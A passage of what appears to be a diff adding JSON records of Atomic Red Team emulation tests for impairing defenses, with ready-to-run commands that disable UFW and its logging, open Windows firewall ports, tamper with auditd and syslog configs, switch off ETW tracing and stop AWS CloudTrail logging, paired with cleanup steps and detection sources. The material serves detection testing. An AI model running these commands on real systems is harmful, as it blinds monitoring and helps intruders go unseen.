advfirewall firewall add rule name=\"Open Port to Any\" dir=in protocol=tcp localport=#{local_port} action=allow profile=any", + "cleanup_command": "netsh advfirewall firewall delete rule name=\"Open Port to Any\" | Out-Null", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Allow Executable Through Firewall Located in Non-Standard Location", + "auto_generated_guid": "6f5822d2-d38d-4f48-9bfc-916607ff6b8c", + "description": "This test will attempt to allow an executable through the system firewall located in the Users directory", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "exe_file_path": { + "description": "path to exe file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1562.004\\bin\\AtomicTest.exe" + } + }, + "executor": { + "command": "Copy-Item #{exe_file_path} -Destination \"C:\\Users\\$env:UserName\" -Force\nnetsh advfirewall firewall add rule name=\"Atomic Test\" dir=in action=allow program=\"C:\\Users\\$env:UserName\\AtomicTest.exe\" enable=yes\n", + "cleanup_command": "netsh advfirewall firewall delete rule name=\"Atomic Test\" | Out-Null\nRemove-Item C:\\Users\\$env:UserName\\AtomicTest.exe -ErrorAction Ignore\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Stop/Start UFW firewall", + "auto_generated_guid": "fe135572-edcd-49a2-afe6-1d39521c5a9a", + "description": "Stop the Uncomplicated Firewall (UFW) if installed.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ufw is installed on the machine.\n", + "prereq_command": "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "ufw disable\n", + "cleanup_command": "ufw enable\nufw status verbose\n" + } + }, + { + "name": "Stop/Start UFW firewall systemctl", + "auto_generated_guid": "9fd99609-1854-4f3c-b47b-97d9a5972bd1", + "description": "Stop the Uncomplicated Firewall (UFW) if installed, using systemctl. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if systemctl and ufw is installed on the machine.\n", + "prereq_command": "if [ ! -x \"$(command -v systemctl)\" ]; then echo -e \"\\n***** systemctl NOT installed *****\\n\"; exit 1; fi\nif [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "systemctl stop ufw\n", + "cleanup_command": "systemctl start ufw\nsystemctl status ufw\n" + } + }, + { + "name": "Turn off UFW logging", + "auto_generated_guid": "8a95b832-2c2a-494d-9cb0-dc9dd97c8bad", + "description": "Turn off the Uncomplicated Firewall (UFW) logging. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ufw is installed on the machine and enabled.\n", + "prereq_command": "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "ufw logging off\n", + "cleanup_command": "ufw logging low\nufw status verbose\n" + } + }, + { + "name": "Add and delete UFW firewall rules", + "auto_generated_guid": "b2563a4e-c4b8-429c-8d47-d5bcb227ba7a", + "description": "Add and delete a rule on the Uncomplicated Firewall (UFW) if installed and enabled. \n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if ufw is installed on the machine and enabled.\n", + "prereq_command": "if [ ! -x \"$(command -v ufw)\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\nif echo \"$(ufw status)\" |grep -q \"inactive\"; then echo -e \"\\n***** ufw inactive *****\\n\"; exit 1; fi \n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "ufw prepend deny from 1.2.3.4\nufw status numbered\n", + "cleanup_command": "{ echo y; echo response; } | ufw delete 1\nufw status numbered\n" + } + }, + { + "name": "Edit UFW firewall user.rules file", + "auto_generated_guid": "beaf815a-c883-4194-97e9-fdbbb2bbdd7c", + "description": "Edit the Uncomplicated Firewall (UFW) rules file /etc/ufw/user.rules.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /etc/ufw/user.rules exists.\n", + "prereq_command": "if [ ! -f \"/etc/ufw/user.rules\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/user.rules\ngrep \"# THIS IS A COMMENT\" /etc/ufw/user.rules\n", + "cleanup_command": "sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/user.rules\n" + } + }, + { + "name": "Edit UFW firewall ufw.conf file", + "auto_generated_guid": "c1d8c4eb-88da-4927-ae97-c7c25893803b", + "description": "Edit the Uncomplicated Firewall (UFW) configuration file /etc/ufw/ufw.conf \nwhich controls if the firewall starts on boot and its logging level.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /etc/ufw/ufw.conf exists.\n", + "prereq_command": "if [ ! -f \"/etc/ufw/ufw.conf\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/ufw.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/ufw.conf\n", + "cleanup_command": "sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/ufw.conf\ncat /etc/ufw/ufw.conf\n" + } + }, + { + "name": "Edit UFW firewall sysctl.conf file", + "auto_generated_guid": "c4ae0701-88d3-4cd8-8bce-4801ed9f97e4", + "description": "Edit the Uncomplicated Firewall (UFW) configuration file for setting network \nvariables /etc/ufw/sysctl.conf.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /etc/ufw/sysctl.conf exists.\n", + "prereq_command": "if [ ! -f \"/etc/ufw/sysctl.conf\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "echo \"# THIS IS A COMMENT\" >> /etc/ufw/sysctl.conf\ngrep \"# THIS IS A COMMENT\" /etc/ufw/sysctl.conf\n", + "cleanup_command": "sed -i 's/# THIS IS A COMMENT//g' /etc/ufw/sysctl.conf\ncat /etc/ufw/sysctl.conf\n" + } + }, + { + "name": "Edit UFW firewall main configuration file", + "auto_generated_guid": "7b697ece-8270-46b5-bbc7-6b9e27081831", + "description": "Edit the Uncomplicated Firewall (UFW) main configuration file for setting \ndefault policies /etc/default/ufw.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /etc/default/ufw exists.\n", + "prereq_command": "if [ ! -f \"/etc/default/ufw\" ]; then echo -e \"\\n***** ufw NOT installed *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "echo \"# THIS IS A COMMENT\" >> /etc/default/ufw\ngrep \"# THIS IS A COMMENT\" /etc/default/ufw\n", + "cleanup_command": "sed -i 's/# THIS IS A COMMENT//g' /etc/default/ufw\n" + } + }, + { + "name": "Tail the UFW firewall log file", + "auto_generated_guid": "419cca0c-fa52-4572-b0d7-bc7c6f388a27", + "description": "Print the last 10 lines of the Uncomplicated Firewall (UFW) log file \n/var/log/ufw.log.\n", + "supported_platforms": [ + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if /var/log/ufw.log exists.\n", + "prereq_command": "if [ ! -f \"/var/log/ufw.log\" ]; then echo -e \"\\n***** ufw NOT logging *****\\n\"; exit 1; fi\n", + "get_prereq_command": "echo \"\"\n" + } + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "tail /var/log/ufw.log\n", + "cleanup_command": "" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall disable", + "description": "A firewall system was disabled.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "firewall" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "added", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "removed", + "target_data_element": "firewall rule" + }, + { + "data_source": "firewall", + "definition": "Information associated with the network security system, running locally on an endpoint or remotely in a cloud environment, that monitors and controls incoming and outgoing network traffic based on predetermined security rules.", + "collection_layers": [ + "cloud", + "host" + ], + "data_source_platform": [ + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Linux", + "macOS", + "Windows", + "Google Workspace" + ], + "data_component": "firewall rule modification", + "description": "A rule of a firewall system was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firewall rule" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + ] + ] + }, + { + "technique_id": "T1562.006", + "command_list": [ + "sed -i '$ a #art_test_1562_006_1' /etc/audisp/audispd.conf\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/auditd.conf\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf\n", + "if [ -f \"/etc/syslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/rsyslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/syslog-ng.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf\nfi\n", + "cmd /c \"$env:temp\\pstools\\PsExec.exe\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"#{provider}\" -ets", + "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"EventLog-Application\" --p \"#{provider}\" -ets", + "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"Microsoft-Windows-Powershell\" -ets", + "REG ADD HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /t REG_DWORD /d 0", + "New-ItemProperty -Path HKLM:\\Software\\Microsoft\\.NETFramework -Name ETWEnabled -Value 0 -PropertyType \"DWord\" -Force" + ], + "commands": [ + { + "command": "sed -i '$ a #art_test_1562_006_1' /etc/audisp/audispd.conf\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/auditd.conf\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/auditd.conf\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/auditd.conf\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/libaudit.conf\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "if [ -f \"/etc/syslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog.conf\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/rsyslog.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/rsyslog.conf\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/syslog-ng.conf\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/syslog-ng.conf\nfi\n", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "cmd /c \"$env:temp\\pstools\\PsExec.exe\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"#{provider}\" -ets", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"EventLog-Application\" --p \"#{provider}\" -ets", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"Microsoft-Windows-Powershell\" -ets", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "REG ADD HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /t REG_DWORD /d 0", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + }, + { + "command": "New-ItemProperty -Path HKLM:\\Software\\Microsoft\\.NETFramework -Name ETWEnabled -Value 0 -PropertyType \"DWord\" -Force", + "source": "atomics/T1562.006/T1562.006.yaml", + "name": "Atomic Red Team Test - Impair Defenses: Indicator Blocking" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1562.006", + "display_name": "Impair Defenses: Indicator Blocking", + "atomic_tests": [ + { + "name": "Auditing Configuration Changes on Linux Host", + "auto_generated_guid": "212cfbcf-4770-4980-bc21-303e37abd0e3", + "description": "Emulates modification of auditd configuration files\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "audisp_config_file_name": { + "description": "The name of the audispd configuration file to be changed", + "type": "String", + "default": "audispd.conf" + }, + "auditd_config_file_name": { + "description": "The name of the auditd configuration file to be changed", + "type": "String", + "default": "auditd.conf" + }, + "libaudit_config_file_name": { + "description": "The name of the libaudit configuration file to be changed", + "type": "String", + "default": "libaudit.conf" + } + }, + "executor": { + "command": "sed -i '$ a #art_test_1562_006_1' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_1' /etc/#{auditd_config_file_name}\nelse sed -i '$ a #art_test_1562_006_1' /etc/audit/#{auditd_config_file_name}\nfi \nsed -i '$ a #art_test_1562_006_1' /etc/#{libaudit_config_file_name}\n", + "cleanup_command": "sed -i '$ d' /etc/audisp/#{audisp_config_file_name}\nif [ -f \"/etc/#{auditd_config_file_name}\" ];\nthen sed -i '$ d' /etc/#{auditd_config_file_name}\nelse sed -i '$ d' /etc/audit/#{auditd_config_file_name}\nfi\nsed -i '$ d' /etc/#{libaudit_config_file_name}\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Logging Configuration Changes on Linux Host", + "auto_generated_guid": "7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c", + "description": "Emulates modification of syslog configuration.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "syslog_config_file_name": { + "description": "The name of the syslog configuration file to be changed", + "type": "String", + "default": "syslog.conf" + }, + "rsyslog_config_file_name": { + "description": "The name of the rsyslog configuration file to be changed", + "type": "String", + "default": "rsyslog.conf" + }, + "syslog_ng_config_file_name": { + "description": "The name of the syslog-ng configuration file to be changed", + "type": "String", + "default": "syslog-ng.conf" + } + }, + "executor": { + "command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ a #art_test_1562_006_2' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "cleanup_command": "if [ -f \"/etc/#{syslog_config_file_name}\" ];\nthen sed -i '$ d' /etc/#{syslog_config_file_name}\nfi\nif [ -f \"/etc/#{rsyslog_config_file_name}\" ];\nthen sed -i '$ d' /etc/#{rsyslog_config_file_name}\nfi\nif [ -f \"/etc/syslog-ng/#{syslog_ng_config_file_name}\" ];\nthen sed -i '$ d' /etc/syslog-ng/#{syslog_ng_config_file_name}\nfi\n", + "name": "bash", + "elevation_required": true + } + }, + { + "name": "Disable Powershell ETW Provider - Windows", + "auto_generated_guid": "6f118276-121d-4c09-bb58-a8fb4a72ee84", + "description": "This test was created to disable the Microsoft Powershell ETW provider by using the built-in Windows tool, logman.exe. This provider is used as a common source of telemetry in AV/EDR solutions.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "ps_exec_location": { + "description": "Location of PSExec.", + "type": "string", + "default": "$env:temp\\pstools\\PsExec.exe" + }, + "session": { + "description": "The session to disable.", + "type": "string", + "default": "EventLog-Application" + }, + "provider": { + "description": "The provider to disable.", + "type": "string", + "default": "Microsoft-Windows-Powershell" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "PSExec must be installed on the machine.", + "prereq_command": "if (Test-Path \"#{ps_exec_location}\") {exit 0} else {exit 1}", + "get_prereq_command": "start-bitstransfer -source \"https://download.sysinternals.com/files/PSTools.zip\" -destination \"$env:temp\\PStools.zip\"\nexpand-archive -literalpath \"$env:temp\\PStools.zip\" -destinationpath \"$env:temp\\pstools\" -force" + } + ], + "executor": { + "command": "cmd /c \"#{ps_exec_location}\" -accepteula -i -s cmd.exe /c logman update trace \"#{session}\" --p \"#{provider}\" -ets", + "cleanup_command": "cmd /c \"#{ps_exec_location}\" -i -s cmd.exe /c logman update trace \"#{session}\" -p \"#{provider}\" -ets", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Disable .NET Event Tracing for Windows Via Registry (cmd)", + "auto_generated_guid": "8a4c33be-a0d3-434a-bee6-315405edbd5b", + "description": "Disables ETW for the .NET Framework using the reg.exe utility to update the Windows registry", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "REG ADD HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /t REG_DWORD /d 0", + "cleanup_command": "REG DELETE HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /f > nul 2>&1", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "Disable .NET Event Tracing for Windows Via Registry (powershell)", + "auto_generated_guid": "19c07a45-452d-4620-90ed-4c34fffbe758", + "description": "Disables ETW for the .NET Framework using PowerShell to update the Windows registry", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "New-ItemProperty -Path HKLM:\\Software\\Microsoft\\.NETFramework -Name ETWEnabled -Value 0 -PropertyType \"DWord\" -Force", + "cleanup_command": "REG DELETE HKLM\\Software\\Microsoft\\.NETFramework /v ETWEnabled /f > $null 2>&1", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "sensor health", + "definition": "Information associated with sensors providing data about host system status.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "host status", + "description": "Data from a sensor about the health of a host system sensor", + "source_data_element": "sensor health", + "relationship": "contained", + "target_data_element": "host system status" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + null, + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1562.008", + "command_list": [ + "aws cloudtrail create-trail --name redatomictesttrail --s3-bucket-name #{s3_bucket_name} --region #{region}\naws cloudtrail update-trail --name redatomictesttrail --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name redatomictesttrail --region #{region}\naws cloudtrail delete-trail --name redatomictesttrail --region #{region}\n", + "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name redatomic-test --region #{region}\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name redatomic-test --is-multi-region-trail --region #{region}\naws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}\naws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}\n", + "aws cloudtrail create-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --region us-east-1\naws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region 